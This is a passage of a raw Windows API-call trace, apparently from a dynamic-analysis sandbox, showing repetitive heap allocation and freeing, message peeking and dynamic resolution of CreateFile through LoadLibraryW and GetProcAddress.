dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0030.812] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0030.812] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.813] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.813] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.813] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.813] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c748 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0030.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0030.814] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.816] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.819] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889610 [0030.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.819] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0030.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.819] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 